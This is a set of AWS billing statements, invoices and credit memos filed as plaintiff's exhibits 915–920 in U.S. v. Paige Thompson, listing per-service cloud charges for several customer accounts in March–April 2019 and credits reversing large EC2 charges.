| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $107.43 |
| Charges | $107.43 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $825.26 |
| Charges | $825.26 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $8.63 |
| Charges | $8.63 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Item | Amount |
|---|---|
| Amazon EC2 Container Registry (ECR) | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Backup | $0.49 |
| Charges | $0.49 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $6.29 |
| Charges | $6.29 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.03 |
| Charges | $0.03 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $227.45 |
| Charges | $227.45 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $2.96 |
| Charges | $2.96 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.78 |
| Charges | $0.78 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $48.96 |
| Charges | $48.96 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Queue Service | $7.49 |
| Charges | $7.49 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Crypto Trading Dev 8935) | $0.00 |
| Charges | $0.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 8935 total allocated for this invoice | $0.00 |

| Detail for Linked Account | |
|---|---|
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number

| Summary for Linked Account | |
|---|---|
| Adobe Hidden Treasures 5524) | $107.47 |
| Charges | $107.47 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 5524 total allocated for this invoice | $107.47 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.03 |
| Charges | $0.03 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $4.17 |
| Charges | $4.17 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon CloudFront | $3.38 |
| Charges | $3.38 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $99.35 |
| Charges | $99.35 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
429466558421

| AWS Backup | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.51 |
| Charges | $0.51 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Mystic Logistics 3887) | $307.27 |
| Charges | $307.27 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 3887 total allocated for this invoice | $307.27 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.18 |
| Charges | $0.18 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $4.84 |
| Charges | $4.84 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $291.25 |
| Charges | $291.25 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $11.00 |
| Charges | $11.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| TradeIt QA 5523) | $822.95 |
| Charges | $822.95 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 5523 total allocated for this invoice | $822.95 |

| Detail for Linked Account | |
|---|---|
| Amazon GuardDuty | $7.86 |
| Charges | $7.86 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $1.15 |
| Charges | $1.15 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $38.61 |
| Charges | $38.61 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $65.27 |
| Charges | $65.27 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $48.96 |
| Charges | $48.96 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Service | Amount |
| --- | --- |
| Amazon Elastic Compute Cloud | $513.24 |
| Charges | $513.24 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $1.85 |
| Charges | $1.85 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| CryptoTrading Prod 6117) | $2,994.65 |
| Charges | $2,994.65 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 6117 total allocated for this invoice | $2,994.65 |

| Detail for Linked Account | |
|---|---|
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $6.52 |
| Charges | $6.52 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $17.51 |
| Charges | $17.51 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $502.24 |
| Charges | $502.24 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Email Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Secrets Manager | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $1,597.12 |
| Charges | $1,597.12 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $1.65 |
| Charges | $1.65 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| | |
|---|---|
| AWS Backup | $1.46 |
| Charges | $1.46 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Redshift | $180.00 |
| Charges | $180.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $197.91 |
| Charges | $197.91 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $4.69 |
| Charges | $4.69 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $328.32 |
| Charges | $328.32 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Queue Service | $13.22 |
| Charges | $13.22 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Dakota Funds 7491) | $339.79 |
| Charges | $339.79 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 7491 total allocated for this invoice | $339.79 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.13 |
| Charges | $0.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.86 |
| Charges | $0.86 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $37.41 |
| Charges | $37.41 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.61 |
| Charges | $0.61 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $0.07 |
| Charges | $0.07 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $299.72 |
| Charges | $299.72 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Amazon Simple Notification Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| TradeIt Prod 0246) | $94.85 |
| Charges | $94.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 0246 total allocated for this invoice | $94.85 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $1.11 |
| Charges | $1.11 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $93.74 |
| Charges | $93.74 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 915



Account number:
7507

Bill to Address:
ATTN: NAVEEN CHAVA
VILLA NO 23 VASWANI WHISPERING PALM
MARTHAHALLI ORR
Bangalore, karnataka, 560037, IN

# Amazon Web Services Statement

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Statement Summary

| | |
|---|---|
| Statement Number: | 8309 |
| Statement Date: | April 3 , 2019 |
| **TOTAL AMOUNT DUE** | **INR 1,214,001.76** |

## This Account Summary is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Internet Services Private Ltd. We're writing to provide you with an account summary of your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $17,553.22 |
| Charges | $14,875.61 |
| Credits | $0.00 |
| GST | $2,677.61 |
| Total for this statement in USD | $17,553.22 |
| Total for this statement (1 USD = 69.161200 INR ) [1] | INR 1,214,001.76 |

[1] INR total calculated using a conversion rate of 69.161200 .

| Detail | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| AWS Data Transfer | $0.09 |
| Charges | $0.08 |
| GST | $0.01 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| Amazon Elastic File System | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 915
Admitted________________

| Amazon Elastic Compute Cloud | $17,553.13 |
| --- | --- |
| Charges | $14,875.53 |
| GST | $2,677.60 |
| Amazon DynamoDB | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

# EXHIBIT 916



Account number:
[redacted]7507

Bill to Address:
PowerSquare Inc.
ATTN: Pavan Pudipeddi
14401 American Kestral Drive
Austin, TX, 78738, US

# Amazon Web Services Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Statement Summary

| | |
|---|---|
| Statement Number: | [redacted]8061 |
| Statement Date: | April 20 , 2019 |
| Original Statement Number: | [redacted]8309 |
| **TOTAL AMOUNT** | **INR (1,210,278.12)** |

**This credit memo was applied to invoice [redacted]8309 to close your payment obligation. Do not pay invoice number [redacted]8309. You do not need to take any action.**

## This Account Summary is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Internet Services Private Ltd. We're writing to provide you with an account summary of your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($17,499.38) |
| Charges | ($14,829.98) |
| GST | ($2,669.40) |
| Total for this statement in USD | ($17,499.38) |
| Total for this statement (1 USD = 69.161200 INR ) [1] | INR (1,210,278.12) |

[1] INR total calculated using a conversion rate of 69.161200 .

| Detail | |
|---|---|
| Amazon Elastic Compute Cloud | ($17,499.38) |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($14,829.98) |
| Charges | ($14,829.98) |
| GST | ($2,669.40) |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 916
Admitted_______________

# EXHIBIT 917



Account number:
7507

Bill to Address:
PowerSquare Inc.
ATTN: Pavan Pudipeddi
14401 American Kestral Drive
Austin, TX, 78738, US

# Amazon Web Services Statement

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Statement Summary

| | |
|---|---|
| Statement Number: | 2621 |
| Statement Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE** | **INR 3,094.13** |

## This Account Summary is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Internet Services Private Ltd. We're writing to provide you with an account summary of your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $44.19 |
| Charges | $1,712.67 |
| Credits | ($1,668.48) |
| GST | $0.00 |
| Total for this statement in USD | $44.19 |
| Total for this statement (1 USD = 70.018800 INR ) [1] | INR 3,094.13 |

[1] INR total calculated using a conversion rate of 70.018800 .

| Detail | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| AWS Data Transfer | $0.04 |
| Charges | $0.04 |
| GST | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| Amazon Elastic File System | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 917
Admitted__________________

| Service | Amount |
|---|---|
| Amazon Elastic Compute Cloud | $44.15 |
| Charges | $1,712.63 |
| Credits | ($1,668.48) |
| GST | $0.00 |
| Amazon DynamoDB | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

# EXHIBIT 918



Account number:
[redacted]4197

Bill to Address:
A T WORKS
ATTN: ATW payment agency service
6-10-1 Roppongi
Roppongi Hills Mori Tower 37F
Minato-ku , TOKYO , 106-6137 , JP

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | [redacted]0777 |
| Invoice Date: | April 3 , 2019 |
| **TOTAL AMOUNT DUE ON April 3 , 2019** | **JPY 2,396,574** |

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $21,301.10 |
| Charges | $19,723.25 |
| Credits | $0.00 |
| Tax * | $1,577.85 |
| Total for this invoice in USD | $21,301.10 |
| Total for this invoice (1 USD = 112.50940229910000 JPY ) | JPY 2,396,574* |

* You have elected for this invoice to be paid in a currency other than US Dollars. For more information regarding this feature please visit the Account Settings page in the Billing Console.

| Detail | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |
| AWS Data Transfer | $395.88 |
| Charges | $366.56 |
| VAT ** | $0.00 |
| CT | $29.32 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 918
Admitted__________________

| | |
|---|---|
| VAT ** | $0.00 |
| CT | $0.00 |
| Amazon Relational Database Service | $588.87 |
| Charges | $545.26 |
| VAT ** | $0.00 |
| CT | $43.61 |
| Amazon Elastic Compute Cloud | $20,316.35 |
| Charges | $18,811.43 |
| VAT ** | $0.00 |
| CT | $1,504.92 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

# EXHIBIT 919



Account number:
4197

Bill to Address:
A T WORKS
ATTN: ATW payment agency service
6-10-1 Roppongi
Roppongi Hills Mori Tower 37F
Minato-ku , TOKYO , 106-6137 , JP

# Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | 1817 |
| Invoice Date: | April 24 , 2019 |
| Original Invoice Number: | 0777 |
| **TOTAL AMOUNT** | **JPY (2,067,366)** |

**This credit memo was applied to invoice 0777 to close your payment obligation. Do not pay invoice number 0777. You do not need to take any action.**

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($18,375.05) |
| Charges | ($17,013.94) |
| Tax * | ($1,361.11) |
| Total for this invoice in USD | ($18,375.05) |
| Total for this invoice (1 USD = 112.50940229910000 JPY ) | JPY (2,067,366)* |

* You have elected for this invoice to be paid in a currency other than US Dollars. For more information regarding this feature please visit the Account Settings page in the Billing Console.

| Detail | |
|---|---|
| Amazon Elastic Compute Cloud | ($18,375.05) |
| Charges | ($17,013.94) |
| VAT ** | $0.00 |
| CT | ($1,361.11) |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($17,013.94) |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 919
Admitted____________________

# EXHIBIT 920



Account number:
[redacted]4197

Bill to Address:
A T WORKS
ATTN: ATW payment agency service
6-10-1 Roppongi
Roppongi Hills Mori Tower 37F
Minato-ku , TOKYO , 106-6137 , JP

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | [redacted]6697 |
| Invoice Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE ON May 3 , 2019** | **JPY 307,572** |

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $2,730.51 |
| Charges | $7,736.52 |
| Credits | ($5,208.27) |
| Tax * | $202.26 |
| Total for this invoice in USD | $2,730.51 |
| Total for this invoice (1 USD = 112.64272522880000 JPY ) | JPY 307,572* |

* You have elected for this invoice to be paid in a currency other than US Dollars. For more information regarding this feature please visit the Account Settings page in the Billing Console.

| Detail | |
|---|---|
